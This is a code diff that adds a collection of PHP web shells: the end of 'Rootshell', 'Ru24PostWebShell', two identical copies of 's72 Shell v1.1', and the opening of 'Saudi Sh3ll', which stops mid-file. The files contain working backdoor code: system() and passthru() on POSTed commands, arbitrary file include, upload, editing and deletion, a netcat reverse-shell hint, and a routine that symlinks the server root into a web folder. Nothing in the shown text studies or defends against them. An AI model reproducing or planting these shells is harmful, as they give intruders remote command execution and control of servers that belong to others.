+      <p align="center">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
+        <br>
+        <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect 
+        back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
+        </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
+<form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Upload File!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>File already exist</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>File uploaded successful</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>File not found</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center">
+      <br>
+<div align="center" style="overflow:auto; width:99%; height:175">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
+}
+closedir($folder);
+?>
+</div><p align="center">&nbsp;</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+      Include 
+      something :)<br>
+      <br>
+&nbsp;</font><form method="POST">
+       <p align="center">
+        <input type="text" name="incl" size="20"><br>
+        <br>
+        <input type="submit" value="Include!" name="inc"></p>
+      </form>
+      <?php @$output = include($_POST['incl']); ?>
+      </td>
+      </tr>
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center"><?
+$scriptname = $_SERVER['SCRIPT_NAME'];
+$filename = $_POST["filename"];
+
+if($_POST["submit"] == "Open")
+{
+	if(file_exists($filename))
+	{
+		$filecontents = htmlentities(file_get_contents($filename));
+
+		if(!$filecontents)
+			$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}		
+else if($_POST["submit"] == "Delete")
+{
+	if(file_exists($filename))
+	{
+		if(unlink($filename))	
+			$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
+		else
+			$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}
+else if($_POST["submit"] == "Save")
+{
+	$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
+
+	if(file_exists($filename))
+		unlink($filename);
+
+	$handle = fopen($filename, "w");
+
+	if(!$handle)
+		$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
+	else
+	{
+		if(!fwrite($handle, $filecontents))
+			$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
+
+		fclose($handle);
+	}
+
+	$filecontents = htmlentities($filecontents);
+}
+else
+{
+	$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
+}
+?>
+<table border="0" align="center">
+		
+		<tr>
+			<td>
+				<table width="100%" border="0">
+				<tr>
+					<td>
+						<form method="post" action="<?echo $scriptname;?>">
+							<input name="filename" type="text" value="<?echo $filename;?>" size="20">
+							<input type="submit" name="submit" value="Open">
+							<input type="submit" name="submit" value="Delete">
+					</td>
+				</tr>
+				</table>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+					<font face="Verdana" style="font-size: 11pt">
+					<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
+					<input type="submit" name="submit" value="Save">
+					<input type="reset" value="Reset">
+				</form>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+				<h2><?echo $status;?></h2>
+			</td>
+		</tr>
+		</table>				</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+<textarea rows="13" cols="55"></textarea><br>
+      &nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
+    </tr>
+  </table>
+  </center>
+</div>
+<br /></p>
+<div align="center">
+  <center>
+  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
+    <tr>
+      <td width="100%" bgcolor="#FCFEBA" height="20">
+      <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  © 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
+    </tr>
+  </table>
+  </center>
+</div>
diff --git a/php/ru24_post_sh.php b/php/ru24_post_sh.php
new file mode 100644
index 0000000..5600c64
--- /dev/null
+++ b/php/ru24_post_sh.php
@@ -0,0 +1,23 @@
+<?php
+/*
+Ru24PostWebShell
+Writed by DreAmeRz
+
+http://www.ru24-team.net
+*/
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+echo "<html>
+<head>
+<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
+<meta http-equiv='pragma' content='no-cache'>
+</head><body>";
+echo "<form method=post>";
+echo "<input type=text name=cmd size=85>";
+echo "</form>";
+echo "<pre>";
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
+echo "".$function($_POST['cmd'])."</pre></body></html>";
+
+
+?>
diff --git a/php/s72 Shell v1.1 Coding.php b/php/s72 Shell v1.1 Coding.php
new file mode 100644
index 0000000..fdcc41a
--- /dev/null
+++ b/php/s72 Shell v1.1 Coding.php	
@@ -0,0 +1,141 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
+<meta name="Microsoft Theme" content="refined 011">
+</head>
+
+<body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
+
+<!--mstheme--><font face="Times New Roman">
+
+<p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
+<font color="#00FF00">Cr@zy_King&nbsp; </font>
+</a> </font></p>
+
+      <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+      <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ 
+      Server Bilgileri ]</td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      </font></b></font>
+</p>
+      <p align="center">
+        <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
+        Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        &nbsp;</font></font><p align="center"><form method="post">
+<p align="center">
+<font color="#800080">
+<br>
+</font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya 
+Kodunuzu Yazın :)</font><font color="#111111"><br>
+<br>
+</font>
+<font color="#FF0000">
+<textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
+<br><input type="submit" value="Çalıştır!"></font><font color="#FF0000"><br>
+&nbsp;<br></font></p>
+      </form>
+      <p align="center">
+        <font color="#FF0000">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
+        &nbsp;<p align="center">
+              <font color="#FF0000">
+              <td width="49%" height="24" bgcolor="#FCFEBA">
+              </font>
+      <p align="center"><font color="#FF0000"><b>
+      <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
+      <td width="51%" height="24" bgcolor="#FCFEBA">
+      </font></b></font>
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Yükle!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>Dosya Zaten Bulunuyor</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>Dosya Başarılı Bir Şekilde Yüklendi</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>Dosya Bulunamadı</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+        <font color="#111111">
+        <br>
+        <br>
+        <br /><br /> </font>
+              <?php 
+// Check for Safe Mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>Güvenlik Açık</b></font>';
+} else {
+   print '<font color=#008000><b>Güvenlik Kapalı</b></font>';
+}
+
+?>
+
+        <!--mstheme--></font>
+
+        </body>
+
+</html>
\ No newline at end of file
diff --git a/php/s72_Shell_v1.1_Coding.php b/php/s72_Shell_v1.1_Coding.php
new file mode 100644
index 0000000..922d976
--- /dev/null
+++ b/php/s72_Shell_v1.1_Coding.php
@@ -0,0 +1,141 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
+<meta name="Microsoft Theme" content="refined 011">
+</head>
+
+<body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
+
+<!--mstheme--><font face="Times New Roman">
+
+<p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
+<font color="#00FF00">Cr@zy_King&nbsp; </font>
+</a> </font></p>
+
+      <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+      <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ 
+      Server Bilgileri ]</td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      </font></b></font>
+</p>
+      <p align="center">
+        <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
+        Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        &nbsp;</font></font><p align="center"><form method="post">
+<p align="center">
+<font color="#800080">
+<br>
+</font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya 
+Kodunuzu Yazın :)</font><font color="#111111"><br>
+<br>
+</font>
+<font color="#FF0000">
+<textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
+<br><input type="submit" value="Çalıştır!"></font><font color="#FF0000"><br>
+&nbsp;<br></font></p>
+      </form>
+      <p align="center">
+        <font color="#FF0000">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
+        &nbsp;<p align="center">
+              <font color="#FF0000">
+              <td width="49%" height="24" bgcolor="#FCFEBA">
+              </font>
+      <p align="center"><font color="#FF0000"><b>
+      <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
+      <td width="51%" height="24" bgcolor="#FCFEBA">
+      </font></b></font>
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Yükle!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>Dosya Zaten Bulunuyor</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>Dosya Başarılı Bir Şekilde Yüklendi</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>Dosya Bulunamadı</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+        <font color="#111111">
+        <br>
+        <br>
+        <br /><br /> </font>
+              <?php 
+// Check for Safe Mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>Güvenlik Açık</b></font>';
+} else {
+   print '<font color=#008000><b>Güvenlik Kapalı</b></font>';
+}
+
+?>
+
+        <!--mstheme--></font>
+
+        </body>
+
+</html>
diff --git a/php/sa.php b/php/sa.php
new file mode 100644
index 0000000..7cd134d
--- /dev/null
+++ b/php/sa.php
@@ -0,0 +1,3865 @@
+<?
+ob_start();
+?>
+
+<?php
+########################################\
+#                                        #
+#            Saudi Sh3ll v1.0            #
+#                                        #
+#             by al-swisre               #
+#                                        #
+########################################/
+
+
+$auth = 0;
+$name='53c2b3524e98b04d105304b7aa5dc97e'; // Saudi
+$pass='f5f091a697cd91c4170cda38e81f4b1a'; // Saudi
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b></b>");
+   }
+}
+?>
+
+
+<?
+
+
+
+
+
+
+@set_time_limit(0);
+@error_reporting(0);
+
+
+if ($_GET['sws']== 'phpinfo')
+{
+
+echo @phpinfo();
+
+exit;
+
+}
+
+
+
+echo '
+
+
+<title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
+<meta http-equiv="content=type"  content="text/html; charset=utf-8" />
+
+
+
+
+
+<style type="text/css">
+  html,body {
+     margin-top: 5px ;
+     padding: 0;
+     outline: 0;
+}
+
+
+body {
+
+    direction: ltr;
+    background-color: #000000;
+    color: #CCCCCC;
+    font-family: Tahoma, Arial, sans-serif;
+    font-weight: bold;
+    text-align: center ;
+}
+
+input,textarea,select{
+font-weight: bold;
+color: #FFFFFF;
+dashed #ffffff;
+border: 1px dotted #003300;
+background-color: black;
+padding: 3px
+}
+
+input:hover{
+box-shadow:0px 0px 4px #009900;
+
+}
+.cont a
+
+{
+
+
+text-decoration: none;
+color: #FFFFFF;
+
+
+
+}
+.hedr
+{
+font-size:32px;
+color: #009900;
+text-shadow: 0px 0px 4px #003300 ;
+
+
+
+}
+
+
+
+.td1{
+
+
+    border: 1px dotted #022B04;
+    padding: 8px;
+    border-radius: 20px;
+    text-shadow: 0px 0px 2px #003300;
+    font-size: 10px;
+    font-family: Tahoma;
+    font-weight: bold;
+
+}
+
+.td1 tr{}
+
+.lol{
+  text-align: left;
+  float: left;
+  background: #990000;
+}
+.nop{
+
+width: 180px;
+text-align: center;
+font-size: 15px;
+font-family:Tahoma;
+color: #003300;
+
+
+
+}
+.nop a{
+  text-decoration: none;
+  color: #003300 ;
+  text-shadow: none;
+  width: 80px;
+  padding: 8px
+
+
+}
+.nop a:hover{
+  color: #FFFFFF;
+ box-shadow: 0px 0px 4px #006600 ;
+
+
+
+  }
+a
+{
+text-decoration: none;
+color: #006600;
+
+}
+
+
+.tmp tr td:hover{
+
+box-shadow: 0px 0px 4px #EEEEEE;
+
+}
+.fot{
+
+font-family:Tahoma, Arial, sans-serif;
+
+  font-size: 13pt;
+}
+
+.ir {
+  color: #FF0000;
+}
+
+.cont
+{
+float:right;
+color: #FFFFFF;
+box-shadow: 0px 0px 4px #003300;
+font-size: 13px;
+padding: 8px
+
+}
+
+.cont a{
+
+ text-decoration: none;
+ color: #FFFFFF;
+ font-family: Tahoma, Arial, sans-serif  ;
+ font-size: 13px;
+ text-shadow: 0px 0px 3px ;
+}
+
+.cont a:hover{
+
+
+  color: #FF0000 ;
+  text-shadow:0px 0px 3px #FF0000 ;
+
+
+}
+
+.cont3
+{
+color: #FFFFFF;
+font-size: 15px;
+padding: 8px
+
+}
+
+.cont3 a{
+
+ text-decoration: none;
+ color: #FFFFFF;
+ font-family: Tahoma, Arial, sans-serif  ;
+ font-size: 15px;
+ text-shadow: 0px 0px 3px ;
+}
+
+.cont3 a:hover{
+
+
+  color: #FF0000 ;
+  text-shadow:0px 0px 3px #FF0000 ;
+
+
+}
+
+.tmp tr td{
+
+border: dotted 1px #003300;
+
+padding: 4px ;
+font-size: 14px;
+}
+
+.tmp tr td a {
+  text-decoration: none;
+
+}
+.cmd
+{
+
+float:right;
+
+}
+ .tbm{
+ font-size: 14px;
+}
+
+.tbm tr td{
+ border: dashed 1px #111111;
+
+}
+.hr{
+
+border: dotted 1px #003300;
+padding: 5px ;
+font-size: 13px;
+color: white ;
+text-shadow: 0px 0px 3px ;
+}
+
+.hr2{
+
+border: dotted 1px #003300;
+padding: 5px ;
+font-size: 13px;
+color: red ;
+text-shadow: 0px 0px 3px ;
+}
+
+.t3p{
+width: 100%;
+
+}
+
+.t3p{margin-left: 45px ;}
+
+.t33p{margin-left: 45px ;}
+
+
+.t3p tr td{
+
+border:  solid 1px #002F00;
+padding: 2px ;
+font-size: 13px;
+text-align: center ;
+font-weight: bold;
+margin-left: 20px ;
+
+}
+.t3p tr td:hover{
+
+box-shadow: 0px 0px 4px #009900;
+
+}
+
+
+.info {margin-left: 100px ; }
+
+.info tr td
+{
+
+border:  solid 1px #002F00;
+padding: 5px ;
+font-size: 13px;
+text-align: center ;
+font-weight: bold;
+
+
+}
+.conn{width: 70%;}
+
+.conn tr td{
+border: 1px dashed #003300;
+padding: 5px ;
+font-size: 13px;
+text-align: center ;
+font-weight: bold;
+
+}
+
+
+.lol a{
+
+font-size: 10px;
+
+}
+
+.d0n{
+width: 90%;
+border-top:  solid 1px #003300;
+
+}
+.d0n tr td{
+font-weight: bold;
+color: #FFFFFF;
+ font-family: Tahoma, Arial, sans-serif  ;
+ font-size: 13px;
+ margin-left: 110px ;
+
+
+}
+.site
+{
+
+font-weight: bold;
+width: 50%;
+box-shadow: 0px 0px 2px #003300;
+
+
+}
+
+.ab
+{
+box-shadow: 0px 0px 6px #444444;
+width: 70%;
+padding: 10px ;
+
+}
+
+.ab tr td
+{
+text-align: center ;
+font-weight: bold;
+ font-family: Tahoma, Arial, sans-serif  ;
+  font-size: 13px;
+ color: white;
+  text-shadow: 0px 0px 2px white ;
+
+
+}
+.ab tr td b
+{
+color:red ;
+text-shadow: 0px 0px 2px red ;
+}
+.ab tr td a
+{
+ color: white;
+  text-shadow: 0px 0px 2px white ;
+
+}
+.ab tr td a:hover
+{
+color:#006600 ;
+text-shadow: none ;
+}
+
+.bru
+{
+color: #FFFFFF;
+font-family: Tahoma, Arial, sans-serif  ;
+font-size: 14px;
+text-shadow: 0px 0px 3px #000000 ;
+
+}
+
+.foter
+{
+
+color: #003300;
+ font-family: Tahoma, Arial, sans-serif  ;
+ font-size: 11px;
+ text-shadow: 0px 0px 3px #000000 ;
+
+
+}
+
+
+
+
+
+
+
+</style>
+
+';
+
+echo '
+
+<table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
+
+			<td width="15%" valign="top" rowspan="2">
+            <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
+             </td>
+
+        <td height="100" align="left" class="td1"   >
+
+';
+
+$pg = basename(__FILE__);
+
+echo "OS : <b><font color=green>";
+$safe_mode = @ini_get('safe_mode');
+$dir = @getcwd();
+$ip=$_SERVER['REMOTE_ADDR'];
+$ips=$_SERVER['SERVER_ADDR'];
+define('SWS','al-swisre');
+
+if ($os)
+{
+
+
+}
+else
+{
+  $os = @php_uname();
+  echo $os ;
+}
+echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
+echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
+echo "</font><br /></b>";
+
+echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
+echo "<br />disable_functions : ";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
+
+
+echo "<font color=red>$df</font></b>";
+
+}
+
+echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
+
+echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
+
+
+echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
+
+echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
+
+
+echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
+
+ | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
+
+| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
+| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";
+
+
+
+
+
+
+
+
+
+ echo "
+<br />
+
+
+
+
+
+
+
+
+        </tr>
+        </table>
+
+<table cellspacing='0' cellpadding='0'  style=' margin:9px'>
+
+    <tr>
+			<td  rowspan='2' class='td1' valign='top' >
+
+
+        <div class='nop'>
+
+         <br /><a href='$pg' >File Manager</a> <br /> <br />
+         <a href='$pg?sws=info' >More info</a> <br /><br />
+         <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
+         <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
+         <a href='$pg?sws=sm' >Symlink</a> <br /><br />
+         <a href='$pg?sws=con' >Connect Back</a> <br /><br />
+         <a href='?sws=brt' >BruteForce</a> <br /><br />
+         <a href='$pg?sws=ab' >About Por</a> <br />
+
+
+
+        </div>
+
+    ";
+
+
+
+
+
+echo '
+
+<td  height="444" width="82%"  align="center" valign="top">
+
+';
+
+
+if(isset($_REQUEST['sws']))
+{
+
+switch ($_REQUEST['sws'])
+{
+
+
+////////////////////////////////////////////////// Symlink //////////////////////////////////////
+
+case 'sm':
+
+$sws = 'al-swisre' ;
+
+$mk = @mkdir('sym',0777);
+
+
+
+$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
+$f =@fopen ('sym/.htaccess','w');
+
+
+@fwrite($f , $htcs);
+
+
+$sym = @symlink("/","sym/root");
+
+
+
+
+$pg = basename(__FILE__);
+
+
+
+echo '<div class="cont3">
